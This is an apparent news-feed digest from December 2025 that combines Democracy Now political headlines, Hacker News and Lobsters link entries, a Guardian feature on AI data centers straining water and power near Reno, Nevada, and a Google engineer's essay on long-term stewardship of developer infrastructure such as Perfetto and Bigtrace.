The U.S. Navy commander overseeing the Pentagon’s attacks on alleged drug boats is set to testify on Capitol Hill today. Admiral Frank M. “Mitch” Bradley will provide a classified briefing to select congressmembers about the U.S. attacks in the Caribbean and eastern Pacific. Human rights groups, including Amnesty International, have condemned the strikes as “murder.”

New York Times Sues Pentagon over Press Policy That “Violates the First Amendment”

Dec 04, 2025

The Pentagon’s inspector general is set to release a report today on Defense Secretary Pete Hegseth’s use of the widely available social media app Signal to discuss U.S. airstrikes in Yemen earlier this year. Two people familiar with the report’s findings told news outlets that Hegseth endangered U.S. troops in using Signal to discuss the strikes with several other senior Trump administration officials. The chat, which included Hegseth’s wife and brother, was revealed when The Atlantic’s editor Jeffrey Goldberg was accidentally added to the Signal group. Defense Secretary Hegseth refused to cooperate with the inspector general, refusing to hand over his phone or sit for an interview.

This comes as The New York Times is suing the Pentagon over its new press policy that requires media outlets to pledge not to gather information unless defense officials formally authorize its release. Earlier this year, reporters at the Times, along with several other media outlets, gave up their press passes rather than comply with the Pentagon’s new policy. The Times argues in its lawsuit that the Pentagon’s policy “is exactly the type of speech- and press-restrictive scheme that the Supreme Court and D.C. Circuit have recognized violates the First Amendment.”

Israeli Forces in Gaza Kill Seven Palestinians in Latest Violation of October Ceasefire

Dec 04, 2025

Israeli forces have killed seven more Palestinians in the Gaza Strip in Israel’s latest violation of the ceasefire that was declared nearly two months ago. Among the dead are five members of a single family — a middle-aged mother, father, their eldest son and their two young children — killed when Israel bombed their tent in Khan Younis. The attack targeted the al-Mawasi evacuation zone, which Israel previously declared a “safe” area for displaced people. It followed funerals for Palestinians killed in strikes a day earlier. This is Saber al-Sakani, whose family members were killed and wounded in an Israeli attack on Gaza City Tuesday.

Saber al-Sakani : “I lost my brother and my two nephews. My brother’s wife and her daughter are hospitalized in intensive care. We’re asking you to stop the wars, for God’s sake.”

Health officials in Gaza report 366 Palestinians have been killed and 938 injured by Israeli forces since the October 10 ceasefire.

Meanwhile, in southern Gaza, hundreds of Palestinians attended a mass wedding for 54 couples in the city of Khan Younis on Tuesday. Organizers called it an act of defiance against Israel’s campaign of genocide against Palestinians.

Maher Mezher : “It is a message for the killers and criminals, whether Ben-Gvir or Smotrich or Netanyahu, that our Palestinian people embrace life, cling to life and love life, and that they will continue in their struggle and strife through this mass wedding and all forms of life. We will continue from the middle of the rubble, destruction and death in the city, the city of Hamad, to send a new message that we will rebuild this destroyed city.”

“An Academic Veneer for Genocide”: Protesters Heckle Former Israeli Politicians at Toronto Debate

Dec 04, 2025

In Toronto, protesters interrupted speakers at a prominent debate series Wednesday evening, after organizers invited four former senior Israeli politicians to a discussion about the two-state solution for Israel and Palestine, without inviting a single Palestinian to the stage. The Munk Debates event featured former Israeli Prime Minister Ehud Olmert, former Foreign Minister Tzipi Livni, former Israeli Ambassador to the U.S. Michael Oren and former Interior Minister Ayelet Shaked.

Protester 1 : “You’re a war criminal!”

Tzipi Livni : “That the Zionist dream is in danger.”

Protester 1 : “You’re all war criminals!”

Protester 2 : [inaudible] “You shouldn’t even be in Canada!”

Protester 1 : “Shut up and leave!”

Protester 2 : “Easy for you to say.”

Protester 1 : “Get the [bleep] out of here! You’re war criminals!”

In a statement, protest organizers wrote, “By putting these individuals on stage — unchallenged by any Palestinian voices — the Munk Debates is creating a sanitized, academic veneer for genocide. The event manufactures consent for ongoing occupation; launders the reputations of officials implicated in war crimes; and rewrites reality by excluding Palestinians entirely.”

Immigration Agents Deploy to New Orleans and Twin Cities, Seeking to Arrest Thousands

Dec 04, 2025

The Trump administration deployed federal Border Patrol agents across immigrant communities in the New Orleans area Wednesday, calling it “Operation Catahoula Crunch.” Gregory Bovino, a senior Border Patrol official who has been the face of President Trump’s mass deportation campaign, was seen patrolling the city’s French Quarter. A New Orleans resident told the Associated Press he watched agents arresting men outside a home improvement store. The Trump administration says it’s seeking to arrest 5,000 people during the surge. It comes as Immigration and Customs agents have begun a mass arrest campaign in Minnesota targeting Somali American communities in the Minneapolis-St. Paul region. The raids follow a Cabinet meeting on Tuesday in which Trump called Somalis “garbage.” Trump then doubled down on his racist rhetoric Wednesday.

ACLU Says ICE Violates Policy Against Jailing Pregnant People and Nursing Moms

Dec 04, 2025

Immigration advocates and lawyers contend that despite ICE’s policy that agents shouldn’t detain, arrest or hold pregnant, postpartum and nursing mothers, pregnant people are increasingly rounded up, deported and detained. The ACLU has documented more than a dozen cases of pregnant women housed without proper medical care at the Stewart Detention Center in Lumpkin, Georgia, and the ICE processing center in Basile, Louisiana. In one case, a woman was shackled while she miscarried. Another woman with a high-risk pregnancy was placed in solitary confinement.

Meanwhile, here in New York City, the news outlet The City is reporting ICE agents arrested a Chinese father named Fei and his 6-year-old son Yuanxin during an immigration check-in in Manhattan last week. The father was separated from his son and taken to an ICE jail in upstate New York. Advocates say “nobody knows” where Yuanxin is being held. According to the Deportation Data Project, the boy is part of a growing number of children arrested and detained by ICE . This year ICE arrested 151 children.

Prisoners Face “Harrowing Human Right Violations” at Infamous ICE Jail in Florida Everglades

Dec 04, 2025

A new report by Amnesty International says that immigrants held at the ICE jail in Florida known as “Alligator Alcatraz” were shackled inside a two-foot-high metal cage and left outside without water for up to a day at a time. The report also details “unsanitary conditions, including overflowing toilets with fecal matter seeping into where people are sleeping, limited access to showers, exposure to insects without protective measures, lights on 24 hours a day, poor quality food and water, and lack of privacy.”

Democrats Release Images of Epstein’s Caribbean Island as Ghislaine Maxwell Petitions for Release

Dec 04, 2025

Democrats on the House Oversight Committee released more than 150 new photos and videos of the late convicted sex offender Jeffrey Epstein’s private island in the Caribbean. The images show a room with a dentist’s chair surrounded by masks, a bedroom, a palm tree-lined swimming pool, and several other living spaces. Democratic Congressmember Robert Garcia, a ranking member on the House Oversight Committee, said, “These new images are a disturbing look into the world of Jeffrey Epstein and his island. We are releasing these photos and videos to ensure public transparency in our investigation and to help piece together the full picture of Epstein’s horrific crimes. We won’t stop fighting until we deliver justice for the survivors.”

Meanwhile, Epstein’s co-conspirator Ghislaine Maxwell, who is currently serving a 20-year sentence for sex trafficking, is planning to ask a court to release her — that’s according to a letter filed at a federal court in Manhattan. Earlier this year, Maxwell was transferred from a federal prison in Florida to a minimum-security camp in Texas about a week after she spoke with Deputy Attorney General Todd Blanche, who is one of President Trump’s former lawyers.

ADP Reports U.S. Economy Lost 32,000 Jobs Last Month

Dec 04, 2025

In labor news, new reporting from the payroll processing firm ADP shows the U.S. economy lost 32,000 jobs last month, led by a drop in small business employment. Most industries laid off workers, with net gains seen only in the hospitality and healthcare sectors. A year ago, the U.S. economy was adding about 200,000 jobs per month; now, it’s had its first three-month decline since the 2020 recession.

Trump Admin to Slash Fuel Efficiency Standards Enacted Under the Biden Admin

Dec 04, 2025

The Trump administration is seeking to slash fuel efficiency standards enacted under the Biden administration. Under current rules, U.S. automakers are required to boost the fuel efficiency of passenger cars and light trucks to about 50 miles per gallon by 2031. The revised standards proposed by the National Highway Traffic Safety Administration would cut that to just 34 miles per gallon. In a statement, the Center for Biological Diversity wrote, “In one stroke, Trump is worsening three of our nation’s most vexing problems: the thirst for oil, high gas pump costs, and global warming.”

Trump to Issue Pardons for Democratic Congressmember Cuellar and His Wife

Dec 04, 2025

President Trump said Wednesday he will issue “full and unconditional” pardons for Democratic Congressmember Henry Cuellar and his wife Imelda, both of whom faced a dozen charges of bribery, money laundering and conspiracy. According to the indictment, the Cuellars accepted roughly $600,000 worth of bribes from a Mexican bank and an oil and gas company owned by the government of Azerbaijan. On X, the Sunrise Movement said, “This is disgusting. Henry Cuellar, the last anti-choice Democrat in the House, sold out his own community for bribes from a foreign government and oil corporation. Then he cozied up to Trump for a pardon while the Democratic establishment stood by and watched.” President Trump justified the pardon by praising Congressmember Cuellar’s stance on immigration.

President Donald Trump : “He’s a respected person. He was treated very badly because he said that people should not be allowed to pour into our country. And he was right. He didn’t like open borders.”

Paramount Skydance Corporation Doubles Proposed Breakup Fee to Acquire Warner Bros.

Dec 04, 2025

In media news, the Paramount Skydance Corporation has more than doubled the proposed breakup fee in its offer to acquire Warner Bros. Discovery, as it seeks to outbid rivals looking to acquire the media conglomerate. The proposed merger comes just months after Skydance completed its acquisition of Paramount, the parent company of CBS , and after Paramount agreed to pay $16 million to settle a lawsuit brought by President Trump, who objected to how “60 Minutes” edited an interview with Kamala Harris. Paramount board chair and controlling shareholder Shari Redstone reportedly sought the settlement to ensure the FCC approved Paramount’s merger. On Wednesday, Redstone defended the settlement during the Reuters NEXT summit in New York City.

Shari Redstone : “I do believe it was the right decision. I think the trial had been set for two years out. The chaos that would have been created over the next two years, I’m not sure the company could have survived, the internal distractions, the external distractions, in spite of everything that we were doing in the company. And during those months we became the number four streaming service. Nobody was talking about that. All people were talking about was the, you know, distraction of the Trump litigation.”

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Imo.im – Instant Messenger

Hacker News
imo.im
2025-12-04 12:25:47
Comments...
Original Article

imo: Free Video Calls and Messages - Official Website

Japanese Four-Cylinder Engine Is So Reliable Still in Production After 25 Years

Hacker News
www.topspeed.com
2025-12-04 12:09:43
Comments...

The AI boom is heralding a new gold rush in the American west

Guardian
www.theguardian.com
2025-12-04 12:00:19
Once home to gold and prospectors, the Nevada desert is now the site of a new kind of expansion: tech data centers Driving down the interstate through the dry Nevada desert, there are few signs that a vast expanse of new construction is hiding behind the sagebrush-covered hills. But, just beyond a ...
Original Article

D riving down the interstate through the dry Nevada desert, there are few signs that a vast expanse of new construction is hiding behind the sagebrush-covered hills. But, just beyond a massive power plant and transmission towers that march up into the dusty brown mountains, lies one of the world’s biggest buildouts of data centers – miles of new concrete buildings that house millions of computer servers.

This business park, called the Tahoe-Reno Industrial Center, has a sprawling landmass greater than the city of Denver. It is home to the largest data center in the US, built by the company Switch, and tech giants like Google and Microsoft have also bought land here and are constructing enormous facilities. A separate Apple data center complex is just down the road. Tesla’s gigafactory, which builds electric vehicle batteries, is a resident too.

In the mid-1800s, this area was an Old West boomtown. It’s situated in Storey county where one of the largest deposits of gold and silver in the American west was discovered, lending it the name: “The Richest Place on Earth”. It’s where Mark Twain came to be a miner, then got his start as a writer for the local newspaper. He later wrote about it in his book Roughing It, saying: “The ‘flush times’ were in magnificent flower … money was as plenty as dust.”

The gold rush is long history, but Storey county is once again one of the fastest growing economies in Nevada. A new boom is happening here in the high desert – fueled by artificial intelligence.

The burgeoning tech, which Silicon Valley vows will be the next frontier for humanity, is minting unfathomable trillion-dollar valuations . It’s a product that’s still being tested, and there’s uncertainty as to how exactly it will transform the economy. But that hasn’t stopped its real-world infrastructure from being built at mass capacity and record speed – a frenzy buoyed by hundreds of billions in venture capital funding .

Desert vegetation with water from the Tahoe‑Reno Industrial Center’s reservoir in the background.
Desert vegetation with water from the Tahoe‑Reno Industrial Center’s reservoir in the background.

Microsoft, working with OpenAI, announced last month that it plans to double its data-center footprint over the next two years. Amazon, partnering with Anthropic, just opened a major cluster with plans for more. Google, Meta and Oracle are preparing vast buildouts, as is a consortium of companies working with the Trump administration on a $500bn project called Stargate. In all, estimates by consulting firm McKinsey and Company peg global spending on AI data centers to total nearly $7tn by 2030 – nearly twice as much as the GDP of the UK.

The buildup comes at a cost. As the planet’s most powerful companies race to fulfill their dreams of artificial general intelligence – a futuristic version of AI that can perform tasks as well as humans – it means an ever-increasing need for computing power. AI requires far more energy and water than other internet tasks. A ChatGPT query needs nearly 10 times as much electricity as an internet search without AI. And because supercomputers run hot, they typically need intensive water-cooling systems. As data centers continue to multiply in communities around the world – from Frankfurt to Johannesburg – AI’s thirst for power and water shows no signs of letting up.

In a place such as Storey county, which is on the frontline of the climate crisis and has an average rainfall of roughly 11in a year, some locals fear the data centers’ demands could decimate already scarce resources.

That includes the Pyramid Lake Paiute, a Native American tribe, which has lived downriver from where the industrial center now sits, since long before Europeans arrived in the Americas.

Switch data center at the Tahoe‑Reno Industrial Center.
Switch data center at the Tahoe‑Reno Industrial Center.

“Everyone cannot keep moving to a space that has no resources. Nevada is completely over-allocated on its ground water resources. It’s the driest state in the union,” said Steven Wadsworth, the tribe’s chairman. “Our tribe’s number one goal is protecting our resources. And it makes it difficult when we have partners upstream who are blissfully unaware.”

‘Miracle in the desert’

On a chilly fall day in October, Kris Thompson hopped into his SUV to take a drive. He has a gravelly voice and fading grey hair and works for Gilman Commercial Real Estate Service, which has been the industrial center’s exclusive brokerage firm since its founding in 1998. As he turned onto USA Parkway, the 18-mile highway that cuts through the park, he pointed out the tall yellow cranes dotting the landscape and the constant stream of semi-trucks rumbling by. “You’re gonna see a lot of hard hats and heavy equipment,” he said.

“When I first came up here, there was nothing but desert dirt trails, coyotes, and rabbitbrush,” Thompson said. “Nothing else was here. No roads, no water wells, no businesses, no drainage, no sewer system, nothing.”

Now, the entire area looks like a city being built from the ground up.

“How do you take 160-sq-miles of desert, of high desert in the mountains, and turn that, 25 years later, into the hottest tech and data center development in the United States?” Thompson asked rhetorically. “They had some cowboys up there, and they were willing to think outside the box.”

Satellite map showing the scale of the Tahoe Reno Industrial Center

One of the cowboy masterminds is Lance Gilman, who also owns the Mustang Ranch brothel. He and his partners bought most of the property from the Gulf Oil company in the late 1990s, which had planned to use the expanse of land for a corporate hunting retreat.

Gilman and his western crew were property developers who struck it big on what Thompson said “has to be the greatest real estate deal ever made on the planet”. They paid $20m to buy a vast private ranch – covering more than 100,000 acres – and created the Tahoe-Reno Industrial Center. It has no residential properties and pre-approves most industrial and commercial uses. Essentially, it can fast track the local government permit process.

The center’s swift permitting hooked Tesla into setting up its first gigafactory there in 2014. The company bought 3,300 acres (13.4 sq km), which span an entire mountain, and immediately set to work building a 6m-sq-ft foundation (nearly 560,000 sq meters) for its battery facility. Tesla convinced the county to rename the road leading to its property, “Electric Avenue”.

A sweeping shot of a landscape with bushes, a lake and mountains.
Pyramid Lake, at the Pyramid Lake Paiute Reservation, is fed by the Truckee River and is located about 40 miles north-east of Reno.

“That put us up on the global stage,” Thompson said of the mega-manufacturing facility. “That speed is everything. In this economy, if it takes you two or three years to get a permit to start building, your product could be obsolete by that point.”

Switch, which builds and operates some of the world’s largest data centers and rents them to a variety of clients, came next, then Google, Microsoft and more. These companies purchased thousands of acres of land to build their data centers. Tract, which has a similar business model to Switch, purchased 11,000 total acres (44.5 sq km) and pledged to invest $100bn into its data center project.

A Gold Rush-esque boom and bust has already come for the industrial park once before. One of the biggest buyers in 2018, four years before the release of ChatGPT, was multimillionaire Jeffrey Berns, who threw down $170m in cash to acquire 67,000 acres (271 sq km) – roughly two-thirds of the park – through his company Blockchains. His goal was to transform the place into a cryptocurrency utopia, which he described to the Guardian as having a “blockchain based self-sovereign identity that eliminated the need for many politicians and governmental agencies”.

That plan didn’t pan out. So, Blockchains sold 2,200 acres (8.9 sq km) to Tract for $250m and plans to offer long-term leases on the remaining acreage. Berns said he’s now focusing on building a billion-dollar bunker in Switzerland.

Every square foot of Gilman’s land at the industrial center has been sold, according to Thompson. What’s available now are parcels that are being resold. Thompson said the fact that those cowboys were able to transform the dusty landscape into a “tech city” is nothing short of a “miracle in the desert”.

A water truck sprays near a construction site at the Tahoe‑Reno Industrial Center.
A water truck sprays near a construction site at the Tahoe‑Reno Industrial Center.

Driving through the tech city, it’s impossible to see the full extent of each company’s construction projects. Google’s complex is triple-fenced and only accessible by private roads. The same goes for other companies, some of which are buried behind desert mountains and towering walls. These businesses are notoriously secretive , citing the need to protect trade secrets, and their security patrols don’t take kindly to curious strangers.

On three separate occasions, private guards told the Guardian to move along when parked on what seemed to be public roads. In one instance, a guard drove up and walked over to the driver-side window. “What are you doing?” he asked curtly. As he peered through the window, he smiled broadly and tilted his head, showing that he was wearing Meta’s smart glasses with the red video recording light turned on.

‘We know what happens when we don’t fight for the water’

Pyramid Lake is the largest lake in Nevada. Situated at the base of several mountain ranges, the lake is owned by the Pyramid Lake Paiute Tribe and entirely surrounded by the tribe’s reservation. They have lived in the region for thousands of years. The Pyramid Lake Paiute’s petroglyphs date back 10,000 to 14,000 years BCE, the oldest in North America.

A man with long hair and wearing a white shirt poses with his face turned toward the sun.
Steven Wadsworth, chairman of the Pyramid Lake Paiute Tribe.

Wadsworth, the tribal chairman, recognizes the need for data centers, but worries if the ones upriver aren’t kept in check, they could intensify threats to the lake – which is the lifeblood for the tribe. The Truckee River supplies the industrial center with water and also serves as the primary source of water for Pyramid Lake.

“It’s not like we’re out here to be a pain,” Wadsworth said. “We know the destruction.”

In the tribe’s governmental office, Wadsworth, sporting waist-length hair and a white button-up tucked into slacks, walked over to a giant satellite map showing the region’s watershed – from California’s mountains to Nevada’s Great Basin. Next to the deep green of Pyramid Lake is a large, flat, white mass, the remnants of a second lake.

“We know what happens when we don’t fight for the water,” Wadsworth said, pointing to the white mass. “This lake used to be full.”

Lake Winnemucca was once fed by Pyramid Lake, but when the Truckee River was dammed in the early 1900s, Wadsworth said it took less than 30 years for Pyramid Lake to drop 80ft and Lake Winnemucca to dry.

The tribe has been fighting for decades now to protect Pyramid Lake and the native fish that inhabit it, including the endangered cui-ui and the threatened Lahontan cutthroat trout. Some of its efforts include purchasing thousands of acre-feet (one acre-foot is equivalent to 1,233 cubic meters) of water rights and bringing several lawsuits over the years. The tribe also lodged complaints with the local Truckee Meadows Water Authority to ensure any water the industrial park siphons from the river is replenished, according to the MIT Technology Review .

skip past newsletter promotion

AI data centers need copious amounts of water. Over the last 10 years, data center water use has tripled to more than 17bn gallons (64bn liters) of water per year in the US, according to a Department of Energy report . Much of that is attributed to the “rapid proliferation of AI servers” and is expected to multiply to nearly 80bn gallons (303bn liters) by 2028. While the figure pales against total US water use, 117tn gallons per year in 2015 , it still can mean a struggle to meet the demands of both human beings and hot computer chips.

An area near the dry lake bed of what was once Lake Winnemucca.
An area near the dry lake bed of what was once Lake Winnemucca, near Nixon, Nevada.

And as data centers continue to proliferate in water-stressed areas around the globe, which can offer cheap land and energy as well as low humidity for easier chip cooling, one of the central concerns in local communities is what happens if the water runs dry.

A large data center using evaporative water cooling consumes around 1m gallons a day, said Shaolei Ren, an associate professor at the University of California at Riverside. He studies AI water consumption and said non-evaporative water-cooling technology can diminish water use, but it’s a balancing act because those systems need more electricity, which, in turn, requires more water.

“Water and energy are not separable,” Ren said.

The industrial park built a reclaimed water reservoir for its data center clients that went into operation in 2023. The project, which cost upwards of $100m, involved constructing a 21-mile pipeline to pump effluent from a wastewater treatment plant to the industrial park. While seen as an alternative to taking water directly from the Truckee River, Wadsworth said the effluent previously would’ve been treated and deposited back into the river. So, the tribe still got involved to ensure the river maintained its flow.

Some environmentalists question putting data centers in any drought-prone region , especially as the climate crisis accelerates.

A man posing for a picture with his hands in his pockets.
Kyle Roerink, executive director of the Great Basin Water Network.

“This place is being touted as the epicenter of the energy revolution, the data revolution, the tech revolution,” said Kyle Roerink, the executive director of the Great Basin Water Network , which works to protect water resources in the region. “But they’re never going to be making water.”

‘We just don’t have the power capacity’

The largest data center in the US is tucked into the industrial park. The sleek grey building with red accents is more than half a mile long, 1.3m-sq-ft, and has the capacity for 130 megawatts of electricity – enough to power 100,000 homes a year. It’s owned by Switch, the company’s first data center in what is now a sprawling campus called “The Citadel.”

The entrance to the “Citadel” does give the impression of a fortress. Its entrance sits high on a giant pile of crushed rocks surrounded by 20-ft cement walls topped with dagger-like iron stakes. Guests drive in through a metal gate and security guards in bullet-proof vests hold visitors’ IDs for the duration of their visit.

The campus, which comes with its own power substation and water reservoir, has multiple gargantuan data centers terraced up into a valley, and Switch is building several more. The company says that when the Citadel is done, it will have approximately 10m-sq-ft (930,000 sq meters) of data centers combined.

Inside Switch’s biggest data center, Reno 1, noisy wall-sized fans blow air over the computers to keep them cool. Rows of identical servers behind black mesh gates line long aisles, an infinite, blinking hall of mirrors. The room is dimly lit except for the servers’ blue and green LEDs as they perform incredibly complex computations.

Power lines run along Interstate 80 outside Reno, Nevada.
Power lines run along Interstate 80 outside Reno, Nevada.

Data centers like this are cropping up worldwide, which means not only an intensified strain on water, but also power. Google wrote in its latest sustainability report that it has seen a 51% increase in carbon emissions in its operations since 2019, while Microsoft had a 23% increase since 2020. Amazon and Meta also saw increases over the last few years, with rises of 33% and 64%, respectively. Some researchers say those are undercounts .

The International Energy Agency estimates total electricity consumption from data centers worldwide could double by 2026 from 2022 levels – roughly equaling the amount used per year as the entire country of Japan. In the US, about 60% of electricity comes from burning fossil fuels , a predominant driver of the climate crisis.

“These are large cities in terms of their electricity consumption,” Ari Peskoe, the director of Harvard’s Electricity Law Initiative, said of data centers. “And then, utilities and other power generators are having a massive buildout of natural gas-fired power plants to support this growth.”

Some companies, like Elon Musk’s xAI, have added huge temporary methane gas generators to supply additional energy to their facilities. And, in data center-heavy regions across the US, plans to decommission coal plants have been delayed to keep electricity flowing. Research analysts for Goldman Sachs say they “expect the proliferation of AI technology, and the data centers necessary to feed it, to drive an increase in power demand the likes of which hasn’t been seen in a generation”.

The power plant that serves the industrial center runs on natural gas and is owned by NV Energy, a utility acquired by Warren Buffett’s Berkshire Hathaway in 2013. The utility has received regulatory approval for at least four new natural gas units over the last couple of years. Meghin Delaney, a company spokesperson, said NV Energy also has several renewable energy projects and requires large energy users, like data centers, to “cover transmission and distribution costs upfront before new projects are built”.

Google data center at the Tahoe‑Reno Industrial Center in Storey county, Nevada.
Google data center at the Tahoe‑Reno Industrial Center in Storey county, Nevada.

One of Switch’s focus is green design and energy efficiency . The company says its data centers are completely powered by renewable energy and what it uses from natural gas facilities, it feeds back to the grid from solar and wind projects. Jason Hoffman, the chief strategy officer for Switch, said the company has spent more than “$20bn in 100% green financing since 2024”. Switch was also a major sponsor of the reclaimed water reservoir at the industrial center.

Google, Amazon, Microsoft, Meta and Apple are also tapping into solar and wind to fuel their data center ambitions. Some tech giants are investing in nuclear and geothermal energy. Apple says its data centers in the Reno area run entirely on solar power.

Tesla, Meta and Tract did not respond to requests for comment. Spokespeople for Microsoft, Apple and Amazon declined to comment but pointed the Guardian to their company’s sustainability reports. Chrissy Moy, a Google spokesperson, said the company uses air cooling in its Storey county data centers; and despite a rise in carbon emissions, she said Google saw a 12% reduction in data center energy emissions in 2024, which the company attributes to “bringing new clean energy online”.

A person pointing two fingers at a point on a map.
Kris Thompson points to a map of the Tahoe‑Reno Industrial Center in Storey county.

On the reservation at Pyramid Lake, Wadsworth said rolling brownouts are common during the hot summer months. “Right around 5 o’clock, everybody gets home, and the power will dip multiple times,” he said. He’s concerned it will only get worse with the deluge of data centers, adding, “We just don’t have the power capacity to keep running all of these things.”

Wild horses

Back on the USA Parkway, Thompson steered his SUV through the industrial center’s mountains. He said about 75% of the calls he now gets are from businesses wanting to secure land for data centers. Thompson has spent years on this land, and its development is a point of pride. So is its preservation. He looked out at the arid terrain gesturing to a cluster of scruffy pinyon pines and rabbitbrush that painted the hillside yellow with blooms. A pair of wild horses grazed nearby.

Horses grazing in a field with a building in the distance.
Horses graze at the Tahoe‑Reno Industrial Center in Storey county, Nevada.

Thompson said the park and its high-tech residents do what they can to protect the horses, which were originally brought to the Americas by Spanish conquistadors and now run wild throughout Nevada’s deserts. The horses are seen by some as controversial , as herds can overrun the hills, trampling the distinct natural landscape. But, in the industrial park, the tech companies love them, Thompson said.

“You know, these tech rogues see themselves in the wild horses,” Thompson said. “They’re independent, they’re running free, they’re self-reliant, they’re doing their own thing.” Which sometimes means a trampling stampede.

tunnl.gg | Expose localhost to the internet

Lobsters
tunnl.gg
2025-12-04 11:44:00
Comments...

Why I Ignore The Spotlight as a Staff Engineer

Lobsters
lalitm.com
2025-12-04 11:34:59
Comments...
Original Article

Lately I’ve been reading Sean Goedecke’s essays on being a Staff+ engineer. His work (particularly Software engineering under the spotlight and It’s Not Your Codebase ) is razor-sharp and feels painfully familiar to anyone in Big Tech.

On paper, I fit the mold he describes: I’m a Senior Staff engineer at Google. Yet, reading his work left me with a lingering sense of unease. At first, I dismissed this as cynicism. After reflecting, however, I realized the problem wasn’t Sean’s writing but my reading.

Sean isn’t being bleak; he is accurately describing how to deal with a world where engineers are fungible assets and priorities shift quarterly. But my job looks nothing like that and I know deep down that if I tried to operate in that environment or in the way he described I’d burn out within months .

Instead I’ve followed an alternate path, one that optimizes for systems over spotlights , and stewardship over fungibility .

We Live in Different Worlds

The foundational reason for our diverging paths is that Sean and I operate in entirely different worlds with different laws governing them.

From Sean’s resume , my understanding is that he has primarily worked in product teams 1 building for external customers. Business goals pivot quarterly, and success is measured by revenue or MAU. Optimizing for the “Spotlight” makes complete sense in this environment. Product development at big tech scale is a crowded room: VPs, PMs and UX designers all have strong opinions. To succeed, you have to be agile and ensure you are working specifically on what executives are currently looking at.

On the other hand, I’ve spent my entire career much more behind the scenes: in developer tools and infra teams.

My team’s customers are thousands of engineers in Android, Chrome, and throughout Google 2 . End users of Google products don’t even know we exist; our focus is on making sure developers have the tools to collect product and performance metrics and debug issues using detailed traces.

In this environment, our relationship with leadership is very different. We’re never the “hot project everyone wants,” so execs are not fighting to work with us. In fact, my team has historically struggled to hire PMs. The PM career ladder at Google incentivizes splashy external launches so we cannot provide good “promotion material” for them. Also, our feedback comes directly from engineers. Adding a PM in the middle causes a loss in translation, slowing down a tight, high-bandwidth feedback loop.

All of this together means our team operates “bottom-up”: instead of execs telling us “you should do X”, we figure out what we think will have the most impact to our customers and work on building those features and tools. Execs ensure that we’re actually solving these problems by considering our impact on more product facing teams.

Compounding Returns of Stewardship

In the product environments Sean describes, where goals pivot quarterly and features are often experimental, speed is the ultimate currency. You need to ship, iterate, and often move on before the market shifts. But in Infrastructure and Developer Experience, context is the currency.

Treating engineers as fungible assets destroys context. You might gain fresh eyes, but you lose the implicit knowledge of how systems actually break. Stewardship, staying with a system long-term, unlocks compounding returns that are impossible to achieve on a short rotation.

The first is efficiency via pattern matching . When you stay in one domain for years, new requests are rarely truly “new.” I am not just debugging code; I am debugging the intersection of my tools and hundreds of diverse engineering teams. When a new team comes to me with a “unique” problem, I can often reach back in time: “We tried this approach in 2021 with the Camera team; here is exactly why it failed, and here is the architecture that actually works”.

But the more powerful return is systemic innovation . If you rotate teams every year, you are limited to solving acute bugs that are visible right now . Some problems, however, only reveal their shape over long horizons.

Take Bigtrace , a project I recently led; it was a solution that emerged solely because I stuck around long enough to see the shape of the problem:

  • Start of 2023 (Observation): I began noticing a pattern. Teams across Google were collecting terabytes or even petabytes of performance traces, but they were struggling to process them. Engineers were writing brittle, custom pipelines to parse data, often complaining about how slow and painful it was to iterate on their analysis.

  • Most of 2023 (Research): I didn’t jump to build a production system. Instead, I spent the best part of a year prototyping quietly in the background while working on other projects. I gathered feedback from these same engineers who had complained and because I had established long-term relationships, they gave me honest and introspective feedback. I learned what sort of UX, latency and throughput requirements they had and figured out how I could meet them.

  • End of 2023 to Start of 2024 (Execution): We built and launched Bigtrace, a distributed big data query engine for traces. Today, it processes over 2 billion traces a month and is a critical part of the daily workflow for 100+ engineers.

If I had followed the advice to “optimize for fungibility” (i.e. if I had switched teams in 2023 to chase a new project) Bigtrace would not exist.

Instead, I would have left during the research phase and my successor would have seen the same “noise” of engineers complaining. But without the historical context to recognize a missing puzzle piece, I think they would have struggled to build something like Bigtrace.

The Power of “No”

One of the most seductive arguments for chasing the “Spotlight” is that it guarantees resources and executive attention. But that attention is a double-edged sword.

High-visibility projects are often volatile. They come with shifting executive whims, political maneuvering, and often end up in situations where long-term quality is sacrificed for short-term survival. For some engineers, navigating this chaos is a thrill. For those of us who care about system stability, it feels like a trap.

The advantage of stewardship is that it generates a different kind of capital: trust . When you have spent years delivering reliable tools, you earn the political capital to say “No” to the spotlight when it threatens the product.

Recently, the spotlight has been on AI. Every team is under pressure to incorporate it. We have been asked repeatedly: “Why don’t you integrate LLMs into Perfetto?” If I were optimizing for visibility, the answer would be obvious: build an LLM wrapper, demo it to leadership, and claim we are “AI-first.” It would be an easy win for my career.

But as a steward of the system, I know that one of Perfetto’s core values is precision . When a kernel developer is debugging a race condition, they need exact timestamps, not a hallucination. Users trust that when we tell them “X is the problem” that it actually is the problem and they’re not going to go chasing their tail for the next week, debugging an issue which doesn’t exist.

But it’s important not to take this too far: skepticism shouldn’t become obstructionism. With AI, it’s not “no forever” but “not until it can be done right” 3 .

A spotlight-seeking engineer might view this approach as a missed opportunity; I view it as protecting what makes our product great: user trust.

The Alternate Currency of Impact

The most common fear engineers have about leaving the “Spotlight” is career stagnation. The logic goes: If I’m not launching flashy features at Google I/O, and my work isn’t on my VP’s top 5 list, how will I ever get promoted to Staff+?

It is true that you lose the currency of “Executive Visibility.” But in infrastructure, you gain two alternate currencies that are just as valuable, and potentially more stable.

Shadow Hierarchy

In a product organization, you often need to impress your manager’s manager. In an infrastructure organization, you need to impress your customers’ managers .

I call this the Shadow Hierarchy. You don’t need your VP to understand the intricacies of your code. You need the Staff+ Engineers in other critical organizations to need your tools.

When a Senior Staff Engineer in Pixel tells their VP, “We literally cannot debug the next Pixel phone without Perfetto” , that statement carries immense weight. It travels up their reporting chain, crosses over at the Director/VP level, and comes back down to your manager.

This kind of advocacy is powerful because it is technical, not political. It is hard to fake. When you are a steward of a critical system, your promotion packet is filled with testimonials from the most respected engineers in the company saying, “This person’s work enabled our success”.

Utility Ledger

While product teams might be poring over daily active users or revenue, we rely on metrics tracking engineering health :

  • Utility: Every bug fixed using our tools is an engineer finding us useful. It is the purest measure of utility.

  • Criticality: If the Pixel team uses Perfetto to debug a launch-blocking stutter, or Chrome uses it to fix a memory leak, our impact is implicitly tied to their success.

  • Ubiquity: Capturing a significant percentage of the engineering population proves you’ve created a technical “lingua franca”. This becomes especially obvious when you see disconnected parts of the company collaborating with each other, using shared Perfetto traces as a “reference everyone understands”.

